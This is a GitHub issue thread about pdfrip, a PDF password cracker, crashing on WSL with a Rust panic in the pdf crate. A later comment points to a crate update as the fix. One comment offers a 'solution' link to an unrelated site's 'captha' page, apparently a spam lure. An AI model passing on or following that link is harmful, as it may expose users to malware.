### ISSUE TITLE
Crash on WSL

### ISSUE THREAD

**Issue by pavelber** [mufeedvh/pdfrip#46]
2024-10-23T09:22:50.285Z INFO  engine > Starting password cracking job...
thread '<unnamed>' panicked at /home/pavel/.cargo/registry/src/index.crates.io-6f17d22bba15001f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
thread '<unnamed>' panicked at /home/pavel/.cargo/registry/src/index.crates.io-6f17d22bba15001f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
thread '<unnamed>' panicked at /home/pavel/.cargo/registry/src/index.crates.io-6f17d22bba15001f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
thread '<unnamed>' panicked at /home/pavel/.cargo/registry/src/index.crates.io-6f17d22bba15001f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
Aborted (core dumped)

**Comment by yslflow** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by adi928** [comment]
I think I fixed this, and you can checkout my fork. I basically updated the pdf crate to 0.9.0.
Pending pull request here: https://github.com/mufeedvh/pdfrip/pull/58
